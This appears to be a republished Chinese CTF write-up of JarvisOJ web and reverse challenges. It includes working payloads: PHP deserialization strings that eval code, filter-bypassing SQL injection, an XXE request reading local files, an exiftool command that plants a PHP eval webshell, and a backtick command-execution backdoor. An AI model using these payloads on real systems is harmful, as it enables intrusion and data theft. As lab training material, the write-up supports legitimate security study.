2. 程式人生 > >JarvisOJ Web&Reverse&Pwn

JarvisOJ Web&Reverse&Pwn

阿新 發佈:2019-01-24

Web

0x01 phpinfo()

這是道php序列化漏洞的題目
1.原理

ini_set('session.serialize_handler', 'php_serialize');
ini_set('session.serialize_handler', 'php');

兩者處理session的方式不同
* php:儲存方式是,鍵名+豎線+經過serialize()函式序列處理的值

name|s:6:"spoock"
  • php_serialize(php>5.5.4):儲存方式是,經過serialize()函式序列化處理的值
a:1:{s:4:"name"
 
;s:6:"spoock";}

2.用法
* 首先訪問test1.php

<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION["spoock"]=$_GET["a"];
?>
這一步將設定session的值 |O:5:"lemon":1:{s:2:"hi";s:14:"echo "spoock";";}

然後’php_serialize’將會設定session對話並且值為a:1:{s:6:”spoock”;s:48:”|O:5:”lemon”:1:{s:2:”hi”;s:14:”echo “spoock”;”;}”;}

  • 然後訪問test2.php
<?php
ini_set('session.serialize_handler', 'php');
session_start();
class lemon {
    var $hi;
    function __construct(){
        $this->hi = 'phpinfo();';
    }

    function __destruct() {
         eval($this->hi);
    }
}
?>
這一步將會利用解析session對話的值,以|為分割符將session分割為鍵名和值兩部分
鍵名:a:
 
1:{s:6:"spoock";s:48:"
值O:5:"lemon":1:{s:2:"hi";s:14:"echo "spoock";";}";}
從而解析出了序列化,自動生成了lemon的類,當類在結尾銷燬時將會呼叫解構函式執行惡意程式碼

  • 檢視效果

    惡意程式碼成功執行

<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }

    function __destruct()
    {
        eval($this->mdzz);
    }
}
if(isset($_GET['phpinfo']))
{
    $m = new OowoO();
}
else
{
    highlight_string(file_get_contents('index.php'));
}
?>
  • 分析要構造session的值為 |O:5:”OowoO”:1:{s:4:”mdzz”;s:7:”echo 1;”;} 形式
<form action="http://web.jarvisoj.com:32784/phpinfo.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" />
</form>

抓包將filename的值改成payload注意轉義字元

最終的提交格式為 |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:27:\"print_r(dirname(__FILE__));\";}

這裡寫圖片描述
利用print_r(scandir(“/opt/lampp/htdocs”));
payload 這裡寫圖片描述

|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:38:\"print_r(scandir(\"/opt/lampp/htdocs\"));\";}

利用file_get_content獲取

|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}

這裡寫圖片描述

0x02 WEB?

這題首先利用了各種掃描工具,但終究沒有結果,在提醒下看了一下原始碼
這裡寫圖片描述
首先利用格式化工具 將程式碼格式化
之後搜尋post字元
這裡寫圖片描述
問題
1.檢測不在後臺
2.checkpass.json應該存在

搜尋checkpass找到檢測程式碼

function(e) {
                if (25 !== e.length) return ! 1;
                for (var t = [], n = 0; n < 25; n++) t.push(e.charCodeAt(n));
                for (var r = [325799, 309234, 317320, 327895, 298316, 301249, 330242, 289290, 273446, 337687, 258725, 267444, 373557, 322237, 344478, 362136, 331815, 315157, 299242, 305418, 313569, 269307, 338319, 306491, 351259], o = [[11, 13, 32, 234, 236, 3, 72, 237, 122, 230, 157, 53, 7, 225, 193, 76, 142, 166, 11, 196, 194, 187, 152, 132, 135], [76, 55, 38, 70, 98, 244, 201, 125, 182, 123, 47, 86, 67, 19, 145, 12, 138, 149, 83, 178, 255, 122, 238, 187, 221], [218, 233, 17, 56, 151, 28, 150, 196, 79, 11, 150, 128, 52, 228, 189, 107, 219, 87, 90, 221, 45, 201, 14, 106, 230], [30, 50, 76, 94, 172, 61, 229, 109, 216, 12, 181, 231, 174, 236, 159, 128, 245, 52, 43, 11, 207, 145, 241, 196, 80], [134, 145, 36, 255, 13, 239, 212, 135, 85, 194, 200, 50, 170, 78, 51, 10, 232, 132, 60, 122, 117, 74, 117, 250, 45], [142, 221, 121, 56, 56, 120, 113, 143, 77, 190, 195, 133, 236, 111, 144, 65, 172, 74, 160, 1, 143, 242, 96, 70, 107], [229, 79, 167, 88, 165, 38, 108, 27, 75, 240, 116, 178, 165, 206, 156, 193, 86, 57, 148, 187, 161, 55, 134, 24, 249], [235, 175, 235, 169, 73, 125, 114, 6, 142, 162, 228, 157, 160, 66, 28, 167, 63, 41, 182, 55, 189, 56, 102, 31, 158], [37, 190, 169, 116, 172, 66, 9, 229, 188, 63, 138, 111, 245, 133, 22, 87, 25, 26, 106, 82, 211, 252, 57, 66, 98], [199, 48, 58, 221, 162, 57, 111, 70, 227, 126, 43, 143, 225, 85, 224, 141, 232, 141, 5, 233, 69, 70, 204, 155, 141], [212, 83, 219, 55, 132, 5, 153, 11, 0, 89, 134, 201, 255, 101, 22, 98, 215, 139, 0, 78, 165, 0, 126, 48, 119], [194, 156, 10, 212, 237, 112, 17, 158, 225, 227, 152, 121, 56, 10, 238, 74, 76, 66, 80, 31, 73, 10, 180, 45, 94], [110, 231, 82, 180, 109, 209, 239, 163, 30, 160, 60, 190, 97, 256, 141, 199, 3, 30, 235, 73, 225, 244, 141, 123, 208], [220, 248, 136, 245, 123, 82, 120, 65, 68, 136, 151, 173, 104, 107, 172, 148, 54, 218, 42, 233, 57, 115, 5, 50, 196], [190, 34, 140, 52, 160, 34, 201, 48, 214, 33, 219, 183, 224, 237, 157, 245, 1, 134, 13, 99, 212, 230, 243, 236, 40], [144, 246, 73, 161, 134, 112, 146, 212, 121, 43, 41, 174, 146, 78, 235, 202, 200, 90, 254, 216, 113, 25, 114, 232, 123], [158, 85, 116, 97, 145, 21, 105, 2, 256, 69, 21, 152, 155, 88, 11, 232, 146, 238, 170, 123, 135, 150, 161, 249, 236], [251, 96, 103, 188, 188, 8, 33, 39, 237, 63, 230, 128, 166, 130, 141, 112, 254, 234, 113, 250, 1, 89, 0, 135, 119], [192, 206, 73, 92, 174, 130, 164, 95, 21, 153, 82, 254, 20, 133, 56, 7, 163, 48, 7, 206, 51, 204, 136, 180, 196], [106, 63, 252, 202, 153, 6, 193, 146, 88, 118, 78, 58, 214, 168, 68, 128, 68, 35, 245, 144, 102, 20, 194, 207, 66], [154, 98, 219, 2, 13, 65, 131, 185, 27, 162, 214, 63, 238, 248, 38, 129, 170, 180, 181, 96, 165, 78, 121, 55, 214], [193, 94, 107, 45, 83, 56, 2, 41, 58, 169, 120, 58, 105, 178, 58, 217, 18, 93, 212, 74, 18, 217, 219, 89, 212], [164, 228, 5, 133, 175, 164, 37, 176, 94, 232, 82, 0, 47, 212, 107, 111, 97, 153, 119, 85, 147, 256, 130, 248, 235], [221, 178, 50, 49, 39, 215, 200, 188, 105, 101, 172, 133, 28, 88, 83, 32, 45, 13, 215, 204, 141, 226, 118, 233, 156], [236, 142, 87, 152, 97, 134, 54, 239, 49, 220, 233, 216, 13, 143, 145, 112, 217, 194, 114, 221, 150, 51, 136, 31, 198]], n = 0; n < 25; n++) {
                    for (var i = 0,
                    a = 0; a < 25; a++) i += t[a] * o[n][a];
                    if (i !== r[n]) return ! 1
                }
                return ! 0

邏輯很簡單,25元方程組 可以線上解
直接利用python的np模組解題
貼上自己的py程式碼

import np
o = [[11, 13, 32, 234, 236, 3, 72, 237, 122, 230, 157, 53, 7, 225, 193, 76, 142, 166, 11, 196, 194, 187, 152, 132, 135], [76, 55, 38, 70, 98, 244, 201, 125, 182, 123, 47, 86, 67, 19, 145, 12, 138, 149, 83, 178, 255, 122, 238, 187, 221], [218, 233, 17, 56, 151, 28, 150, 196, 79, 11, 150, 128, 52, 228, 189, 107, 219, 87, 90, 221, 45, 201, 14, 106, 230], [30, 50, 76, 94, 172, 61, 229, 109, 216, 12, 181, 231, 174, 236, 159, 128, 245, 52, 43, 11, 207, 145, 241, 196, 80], [134, 145, 36, 255, 13, 239, 212, 135, 85, 194, 200, 50, 170, 78, 51, 10, 232, 132, 60, 122, 117, 74, 117, 250, 45], [142, 221, 121, 56, 56, 120, 113, 143, 77, 190, 195, 133, 236, 111, 144, 65, 172, 74, 160, 1, 143, 242, 96, 70, 107], [229, 79, 167, 88, 165, 38, 108, 27, 75, 240, 116, 178, 165, 206, 156, 193, 86, 57, 148, 187, 161, 55, 134, 24, 249], [235, 175, 235, 169, 73, 125, 114, 6, 142, 162, 228, 157, 160, 66, 28, 167, 63, 41, 182, 55, 189, 56, 102, 31, 158], [37, 190, 169, 116, 172, 66, 9, 229, 188, 63, 138, 111, 245, 133, 22, 87, 25, 26, 106, 82, 211, 252, 57, 66, 98], [199, 48, 58, 221, 162, 57, 111, 70, 227, 126, 43, 143, 225, 85, 224, 141, 232, 141, 5, 233, 69, 70, 204, 155, 141], [212, 83, 219, 55, 132, 5, 153, 11, 0, 89, 134, 201, 255, 101, 22, 98, 215, 139, 0, 78, 165, 0, 126, 48, 119], [194, 156, 10, 212, 237, 112, 17, 158, 225, 227, 152, 121, 56, 10, 238, 74, 76, 66, 80, 31, 73, 10, 180, 45, 94], [110, 231, 82, 180, 109, 209, 239, 163, 30, 160, 60, 190, 97, 256, 141, 199, 3, 30, 235, 73, 225, 244, 141, 123, 208], [220, 248, 136, 245, 123, 82, 120, 65, 68, 136, 151, 173, 104, 107, 172, 148, 54, 218, 42, 233, 57, 115, 5, 50, 196], [190, 34, 140, 52, 160, 34, 201, 48, 214, 33, 219, 183, 224, 237, 157, 245, 1, 134, 13, 99, 212, 230, 243, 236, 40], [144, 246, 73, 161, 134, 112, 146, 212, 121, 43, 41, 174, 146, 78, 235, 202, 200, 90, 254, 216, 113, 25, 114, 232, 123], [158, 85, 116, 97, 145, 21, 105, 2, 256, 69, 21, 152, 155, 88, 11, 232, 146, 238, 170, 123, 135, 150, 161, 249, 236], [251, 96, 103, 188, 188, 8, 33, 39, 237, 63, 230, 128, 166, 130, 141, 112, 254, 234, 113, 250, 1, 89, 0, 135, 119], [192, 206, 73, 92, 174, 130, 164, 95, 21, 153, 82, 254, 20, 133, 56, 7, 163, 48, 7, 206, 51, 204, 136, 180, 196], [106, 63, 252, 202, 153, 6, 193, 146, 88, 118, 78, 58, 214, 168, 68, 128, 68, 35, 245, 144, 102, 20, 194, 207, 66], [154, 98, 219, 2, 13, 65, 131, 185, 27, 162, 214, 63, 238, 248, 38, 129, 170, 180, 181, 96, 165, 78, 121, 55, 214], [193, 94, 107, 45, 83, 56, 2, 41, 58, 169, 120, 58, 105, 178, 58, 217, 18, 93, 212, 74, 18, 217, 219, 89, 212], [164, 228, 5, 133, 175, 164, 37, 176, 94, 232, 82, 0, 47, 212, 107, 111, 97, 153, 119, 85, 147, 256, 130, 248, 235], [221, 178, 50, 49, 39, 215, 200, 188, 105, 101, 172, 133, 28, 88, 83, 32, 45, 13, 215, 204, 141, 226, 118, 233, 156], [236, 142, 87, 152, 97, 134, 54, 239, 49, 220, 233, 216, 13, 143, 145, 112, 217, 194, 114, 221, 150, 51, 136, 31, 198]]
r = [325799, 309234, 317320, 327895, 298316, 301249, 330242, 289290, 273446, 337687, 258725, 267444, 373557, 322237, 344478, 362136, 331815, 315157, 299242, 305418, 313569, 269307, 338319, 306491, 351259]
o = np.array(o)
r = np.array(r)
x = np.linalg.solve(o,r)
print x
string = ''
for i in x:

    string += chr(int(str(i)[0:-2]))
print string

自己也是做了很多上傳的題目,也一直想做個總結
這道題很明顯是上傳的題目
上傳題我們一般考慮到幾點

1.首先要繞過過濾上傳檔案
2.執行上傳的檔案

繞過上傳例如
1.%00截斷
2.各種花式上傳
最重要的就是執行上傳的檔案要記住以下幾點
1.jpg中的php程式碼可以執行
2.zip等壓縮包中的程式碼可以通過偽協議
3.繞過內容檢測

<script language='php'>
echo "123";
</script>

看看這題
首先考慮各種花式上傳目的是要上傳PHP檔案能夠執行惡意程式碼
發現沒有作用,轉換思路發現也不能上傳zip
那麼只能是jpg中嵌入PHP程式碼了,必須找到檔案包含才可以
http://web.jarvisoj.com:32785/index.php?page=view
典型的檔案包含注意後面的.php會自動加上需要截斷
那麼上傳的內容為
這裡寫圖片描述
直接訪問即可
這裡寫圖片描述

0x04 Login

簡單的注入題
看頭髮現hint
"select * from admin where password='".md5($pass,true)."'"
以前的部落格有詳細的講解
這裡寫圖片描述

0x05 PORT51

直接看圖
這裡寫圖片描述
目的是用本機51埠去訪問網頁,使用vps 51埠訪問
curl --local-port 51 http://web.jarvisoj.com:32770/
這裡寫圖片描述

0x06 LOCALHOST

X-Forwarded-For欄位設定為127.0.0.1即可
這裡寫圖片描述

0x07 神盾局的祕密

去年做這題時很困難,今年再看時發現如此簡單
看下邏輯
看原始碼發現了
<img src="showimg.php?img=c2hpZWxkLmpwZw==" width="100%"/>
這裡有個檔案包含,base64解碼之後得到shield.jpg
嘗試讀取index.php

<?php 
    require_once('shield.php');
    $x = new Shield();
    isset($_GET['class']) && $g = $_GET['class'];
    if (!empty($g)) {
        $x = unserialize($g);
    }
    echo $x->readfile();
?>

利用同樣的方法讀取shield.php

<?php
    //flag is in pctf.php
    class Shield {
        public $file;
        function __construct($filename = '') {
            $this -> file = $filename;
        }

        function readfile() {
            if (!empty($this->file) && stripos($this->file,'..')===FALSE  
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
                return @file_get_contents($this->file);
            }
        }
    }
?>

最簡單的序列化漏洞
直接利用指令碼生成序列化的值

<?php
    //flag is in pctf.php
    class Shield {
        public $file;
        function __construct($filename = '') {
            $this -> file = $filename;
        }

        function readfile() {
            if (!empty($this->file) && stripos($this->file,'..')===FALSE  
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
                return @file_get_contents($this->file);
            }
        }
    }

$q = new Shield();
$q->file = 'pctf.php';
echo serialize($q);
?>

輸入即可
這裡寫圖片描述

0x08 IN A Mess

原始碼洩露index.phps
看思路
首先用AVWS掃描出來了index.phps目錄
程式碼如下

<?php

error_reporting(0);
echo "<!--index.phps-->";

if(!$_GET['id'])
{
    header('Location: index.php?id=1');
    exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
    echo 'Hahahahahaha';
    return ;
}
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!")
echo "yes";
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
    require("flag.txt");
}
else
{
    print "work harder!harder!harder!";
}


?>

這樣我們得到了原始碼就是簡單的繞過了
1.$data=="1112 is a nice lab!"
可以利用遠端檔案包含在allow_url_include開啟時可以使用,但發現對$a有了.過濾所以還是data協議比較穩妥,這裡有學習連結
最後繞過姿勢為a=data:,1112 is a nice lab!
2.$id==0
典型的PHP弱比較可參見我以前的部落格
這裡可以使id=0e123id=asd任意字串
3.strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
strlen函式對%00不截斷但substr截斷那麼可以令b=%00412311
顯示出來
Come ON!!! {/^HT2mCpcvOLf}
猜測是個目錄
開啟是個注入
簡單過濾了空格,去除敏感字元
利用/*1*/繞過
這裡寫圖片描述
欄位數為3

這裡寫圖片描述
顯示位為 3

這裡寫圖片描述
id=-1/*12*/uniunionon/*12*/seselectlect/*12*/1,2,(seselectlect/*12*/group_concat(table_name)/*12*/frfromom/*12*/information_schema.tables/*12*/where/*12*/table_schema=database())%23
表名為content

這裡寫圖片描述
id=-1/*12*/uniunionon/*12*/seselectlect/*12*/1,2,(selselectect/*12*/group_concat(column_name)/*12*/frofromm/*12*/information_schema.columns/*12*/where/*12*/table_name=0x636f6e74656e74)%23
找到了context欄位

這裡寫圖片描述

0x09 api呼叫

打開發現
Content-Type: application/json
需要讀取 flag 猜測是不是 xxe 然後搜到了
http://bobao.360.cn/learning/detail/360.html
Content-Type 頭被修改為 application/xml,客戶端會告訴伺服器 post 過去的資料是 XML 格式的.
加一個 Content-Type: application/xml
payload

POST /api/v1.0/try HTTP/1.1
Host: web.jarvisoj.com:9882
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/xml
Referer: http://web.jarvisoj.com:9882/
Content-Length: 173
Cookie: __cfduid=d5003f0545042bbe0fbc573cda35051f71472823285; UM_distinctid=15abdd622a49f-02e5d4fef34197-7f682331-100200-15abdd622a5cf; role=s%3A5%3A%22guest%22%3B; hsh=3a4727d57463f122833d9e732f94e4e0
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:////home/ctf/flag.txt" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>

這裡寫圖片描述

0x0a Simple Injection

一道非常簡答的SQL注入直接用sqlmap跑就可以
這裡寫圖片描述
這裡寫圖片描述
這裡寫圖片描述

0x0b 圖片上傳漏洞

這是道CVE的題目,真心不會寫,看了別人的wp,跟著做了一遍
首先掃到了test.php 但是不知道怎麼利用
一開始以為是正常的上傳套路但發現各種方式都不行
最後發現phpinfo中的imagick
這裡寫圖片描述
經典的漏洞

先用 exiftool 生成一個一句話後門 路徑由 phpinfo 得到

exiftool -label="\"|/bin/echo \<?php \@eval\(\\$\_POST\[x\]\)\;?\> > /opt/lampp/htdocs/uploads/x.php; \"" 1.png
接著上傳該檔案
這裡寫圖片描述
注意filetype引數為show
利用菜刀連線
這裡寫圖片描述

0x0c chopper

這一題說好還是不好呢, 這裡猜測是用file_get_content編寫
假設1.php 2.php都是下面程式碼

<?php 
echo file_get_contents("$_GET[a]");
?>

3.php 是下面程式碼

<?php 
echo `$_GET[360]`;
 ?>

那麼我執行http://127.0.0.1/1.php?a=http://127.0.0.1/2.php?a=http://127.0.0.1/3.php?360=ping
這裡寫圖片描述

看題目吧
題目一開始是管理員登入,要求使用admin登入
檢視原始碼有驚喜
這裡寫圖片描述
admin IP is 103.27.76.153
這就意味著我要用這個去訪問/admin/目錄
觀察圖片發現了一個proxy.php
<img src="proxy.php?url=http://dn.jarvisoj.com/static/images/proxy.jpg" alt="">
很明顯一個代理,我們可以用這個去訪問admin ip 然後讓admin IP 訪問/admin/目錄,這裡找到
訪問網址
http://web.jarvisoj.com:32782/proxy.php?url=http://103.27.76.153/proxy.php?url=http://web.jarvisoj.com:32782/admin/
這裡寫圖片描述
找到robots.txt

User-agent: *
Disallow:trojan.php
Disallow:trojan.php.txt

開啟trojan.php.txt 在本地執行
這裡寫圖片描述
發現鍵值為360
這裡寫圖片描述

0x0d flag在管理員手裡

研究hash長度擴充套件攻擊已經有一段時間了,總體來說就是我們知道一個加鹽的hash值,即使我們不知道鹽的具體內容,但只要知道長度就可以隨便偽造種帶鹽的hash(相當於我們控制了明密文)
具體的分析見我的另一篇部落格

Reverse

0x01FindKey

用Ubuntu file 指令檢視檔案格式為pyc
之後直接用uncompyle6 指令(如果沒有自行安裝 直接pip就行)
直接得到

# uncompyle6 version 2.9.9
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.12 (default, Nov 19 2016, 06:48:10) 
# [GCC 5.4.0 20160609]
# Embedded file name: findkey
# Compiled at: 2016-04-30 17:54:18
import sys
lookup = [
 196, 153, 149, 206, 17, 221, 10, 217, 167, 18, 36, 135, 103, 61, 111, 31, 92, 152, 21, 228, 105, 191, 173, 41, 2, 245, 23, 144, 1, 246, 89, 178, 182, 119, 38, 85, 48, 226, 165, 241, 166, 214, 71, 90, 151, 3, 109, 169, 150, 224, 69, 156, 158, 57, 181, 29, 200, 37, 51, 252, 227, 93, 65, 82, 66, 80, 170, 77, 49, 177, 81, 94, 202, 107, 25, 73, 148, 98, 129, 231, 212, 14, 84, 121, 174, 171, 64, 180, 233, 74, 140, 242, 75, 104, 253, 44, 39, 87, 86, 27, 68, 22, 55, 76, 35, 248, 96, 5, 56, 20, 161, 213, 238, 220, 72, 100, 247, 8, 63, 249, 145, 243, 155, 222, 122, 32, 43, 186, 0, 102, 216, 126, 15, 42, 115, 138, 240, 147, 229, 204, 117, 223, 141, 159, 131, 232, 124, 254, 60, 116, 46, 113, 79, 16, 128, 6, 251, 40, 205, 137, 199, 83, 54, 188, 19, 184, 201, 110, 255, 26, 91, 211, 132, 160, 168, 154, 185, 183, 244, 78, 33, 123, 28, 59, 12, 210, 218, 47, 163, 215, 209, 108, 235, 237, 118, 101, 24, 234, 106, 143, 88, 9, 136, 95, 30, 193, 176, 225, 198, 197, 194, 239, 134, 162, 192, 11, 70, 58, 187, 50, 67, 236, 230, 13, 99, 190, 208, 207, 7, 53, 219, 203, 62, 114, 127, 125, 164, 179, 175, 112, 172, 250, 133, 130, 52, 189, 97, 146, 34, 157, 120, 195, 45, 4, 142, 139]
pwda = [
 188, 155, 11, 58, 251, 208, 204, 202, 150, 120, 206, 237, 114, 92, 126, 6, 42]
pwdb = [53, 222, 230, 35, 67, 248, 226, 216, 17, 209, 32, 2, 181, 200, 171, 60, 108]
flag = raw_input('Input your Key:').strip()
if len(flag) != 17:
    print 'Wrong Key!!'
    sys.exit(1)
flag = flag[::-1]
for i in range(0, len(flag)):
    if ord(flag[i]) + pwda[i] & 255 != lookup[i + pwdb[i]]:
        print 'Wrong Key!!'
        sys.exit(1)

print 'Congratulations!!'
# okay decompiling 1.pyc

直接寫解密程式就好了

# uncompyle6 version 2.9.9
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.12 (default, Nov 19 2016, 06:48:10) 
# [GCC 5.4.0 20160609]
# Embedded file name: findkey
# Compiled at: 2016-04-30 17:54:18
import sys
lookup = [
 196, 153, 149, 206, 17, 221, 10, 217, 167, 18, 36, 135, 103, 61, 111, 31, 92, 152, 21, 228, 105, 191, 173, 41, 2, 245, 23, 144, 1, 246, 89, 178, 182, 119, 38, 85, 48, 226, 165, 241, 166, 214, 71, 90, 151, 3, 109, 169, 150, 224, 69, 156, 158, 57, 181, 29, 200, 37, 51, 252, 227, 93, 65, 82, 66, 80, 170, 77, 49, 177, 81, 94, 202, 107, 25, 73, 148, 98, 129, 231, 212, 14, 84, 121, 174, 171, 64, 180, 233, 74, 140, 242, 75, 104, 253, 44, 39, 87, 86, 27, 68, 22, 55, 76, 35, 248, 96, 5, 56, 20, 161, 213, 238, 220, 72, 100, 247, 8, 63, 249, 145, 243, 155, 222, 122, 32, 43, 186, 0, 102, 216, 126, 15, 42, 115, 138, 240, 147, 229, 204, 117, 223, 141, 159, 131, 232, 124, 254, 60, 116, 46, 113, 79, 16, 128, 6, 251, 40, 205, 137, 199, 83, 54, 188, 19, 184, 201, 110, 255, 26, 91, 211, 132, 160, 168, 154, 185, 183, 244, 78, 33, 123, 28, 59, 12, 210, 218, 47, 163, 215, 209, 108, 235, 237, 118, 101, 24, 234, 106, 143, 88, 9, 136, 95, 30, 193, 176, 225, 198, 197 
 

            
  

           

              
              

            

            
相關推薦

			   
            
            
            
 

    


    
    
JarvisOJ Web&Reverse&Pwn

     
 
							
							
							




Web



0x01 phpinfo()



這是道php序列化漏洞的題目 
1.原理



ini_set('session.serialize_handler', 'php_serialize');
ini_set('session.seria 



  
 

    


    
    
SYSUCSA  reverse pwn Misc Crypto部分題解

     
 
							
							
							reverse
1.heythere
用IDA64 開啟檔案,按F5檢視main函式程式碼

發現flag應該為輸入字串的每一位字元與i的異或。
雙擊s,檢視原始的字串、

可以知道串中的每個字元都是用16進製表示的。
接下來可以用Python或者c++程式設計 



  
 

    


    
    
ISCC2018 Reverse & Pwn writeup

     
 Reference:L1B0
Re

RSA256
春秋歡樂賽原題。。flag都不變的
給了三個加密檔案和公鑰證書public.key,可以使用openssl進行處理  


$openssl rsa -pubin -text -modulus -in ./public.key
Public-Key: (25 



  
 

    


    
    
JarvisOJ平臺Web題部分writeup

     
 hint   平臺   alt   ade   文本   col   指定   iso   linux   PORT51

這道題本來以為是訪問服務器的51號端口,但是想想又不太對,應該是本地的51號端口訪問服務器
想著用linux下的curl命令指定本地端口
curl --local-port 51 htt 



  
 

    


    
    
jarvisoj刷題之旅】pwn題目Tell Me Something的writeup

     
  
 
 
 題目資訊: 
  
 file一下  發現是64位的ELF 
  
 checksec檢查下安全性 
  
 objdump -t 檔名   可以檢視符號表 
 [email protected]:~/Desktop/jarvisOJ$ objdump - 



  
 

    


    
    
記錄一次手動脫殼 Jarvisoj Reverse Evil.exe

     
 
                這個題目的分值是200,對我來說是個不小的挑戰啊。

查了一下殼,沒有發現什麼



真的這麼簡單?拖入IDA觀察:



呃呃呃,果然不簡單;在IDA裡面沒有任何函式的痕跡。只有一個.text段。

猜測,應該是加了某種殼對源程式加密過。用OD載入。



看到OD的提示, 



  
 

    


    
    
Failed to start A high performance web server and a reverse

     
  
  
  
 
                  
  
   點選開啟連結
   
  
  
   
  
  
   I am running ng 



  
 

    


    
    
Writeup of level3(Pwn) in JarvisOJ

     
 
                
又拾起了被我擱在一邊快一個月的Pwn……(這一個月我被Android逆向拐跑了?)
不扯了,看題。
0x00 checksec
拿到檔案先查checksec,得到如下資訊:
[email protected]:~/Desktop/Pwn/level3# check 



  
 

    


    
    
Failed to start A high performance web server and a reverse proxy server  錯誤提示

     
 I am running nginx on Raspbian Jessie operating system.
I just created new virtual host and reloaded nginx service:/etc/init.d/nginx restart
Now I got:[... 



  
 

    


    
    
廣西首屆網路安全選拔賽PWNREVERSE、決賽題目

     
 
							
							
							逆向和溢位沒太多研究(無flag的為未解出),這兩類和決賽題目放一起以減少篇幅!



溢位類(PWN)


  PWN 在黑客俚語中代表著,攻破,取得許可權,在CTF中它代表著溢位類的題目。




高水平溢位


分值:500
附件:55ed7cb0866e 



  
 

    


    
    
Struts2框架(二) Web.xml, Struts.xml, Action.Java 基本配置

     
 str   web.xml   images   ava   img   ima   blog   XML   ges   

 

 Struts2框架(二) Web.xml, Struts.xml, Action.Java 基本配置 



  
 

    


    
    
ASP.NET web application中的redirect

     
 services   append   窗口   eve   redirect   系統   permanent   lac   tran   在開發ASP.NET MVC web application過程中,開發上線了新系統後,需要把老系統的url redirect新系統下
其中在項目系統目錄下有一個文件 



  
 

    


    
    
Web優化 --利用css sprites降低圖片請求

     
 term   idt   有變   可讀性   坐標定位   name   單位   分批   rect   








sprites是鬼怪,小妖精,調皮鬼的意思,初聽這個高端洋氣的名字我被震懾住了,一步步掀開其面紗後發覺非常easy的東西。作用卻非常大


什麽是CSS Sprites


  
C 



  
 

    


    
    
一種大氣簡單的Web管理(陳列)版面設計

     
 borde   absolut   setup   hid   color   正常的   for   pre   ==   

        在頁面的設計中,多版面是一種常見的設計樣式。本文命名一種 這種樣式。能夠簡單描寫敘述為一行top,一列左文件夾,剩余的右下的空間為內容展示區。這種樣式,便於高速定位 



  
 

    


    
    
web測試中的測試點和測試方法總結

     
 動態   小數   圖片尺寸   提示信息   方便   margin   style   容錯性   字符型   測試是一種思維,包括情感思維和智力思維,情感思維主要體現在一句俗語:思想決定行動上(要懷疑一切),智力思維主要體現在測試用例的設計上。具有了這樣的思想,就會找出更多的bug。

 

一、輸入框 



  
 

    


    
    
Web驗證碼圖片的生成-基於Java的實現

     
 submit   esc   page   resp   ioe   代碼   oge   cnblogs   pro   
驗證碼圖片是由程序動態產生的,每次訪問的內容都是隨機的。那麽如何采用程序動態產生圖片,並能夠顯示在客戶端頁面中呢?原理很簡單,對於java而言,我們首先開發一個Servlet,這個Se 



  
 

    


    
    
web前端技術框架選型參考

     
 hub   社區   規範   應用設計   one   屬於   webpack   body   數據流   一、出發點

  隨著Web技術的不斷發展,前端架構框架、UI框架、構建工具、CSS預處理等層出不窮,各有千秋。太多的框架在形成初期,都曾在web領域
掀起過一場技術浪潮,可有些卻僅僅是曇花 



  
 

    


    
    
MVC模式在Java Web應用程序中的實例分析

     
 rip   run   writer   fault   esp   身份驗證   int   網站   table   結合六個基本質量屬性
可用性:
異常
可修改性:
1.維持語義的一致性,高內聚低耦合
2.維持現有的接口,Login依賴LoginIService接口,LoginService依賴ILog 



  
 

    


    
    
Web.Config文件詳解

     
 htm   用法   名稱   href   會話狀態   行為   cookie   程序配置   會話   一).Web.Config是以XML文件規範存儲,配置文件分為以下格式    1.配置節處理程序聲明      特點: 位於配置文件的頂部,包含在<configSections>標誌中。 



  
 

    


    
    
web登錄zabbix報DB type is not set

     
 db type is not set今天通過web訪問zabbix的時候,報如下錯誤查看關於zabbix的web界面設置的php文件,不知道為啥變成了空文件,報錯原因get!好在這個文件是有模板的,不用自己從零開始配置,下面看看這個模板文件的內容[[email protected]/*  */ ~]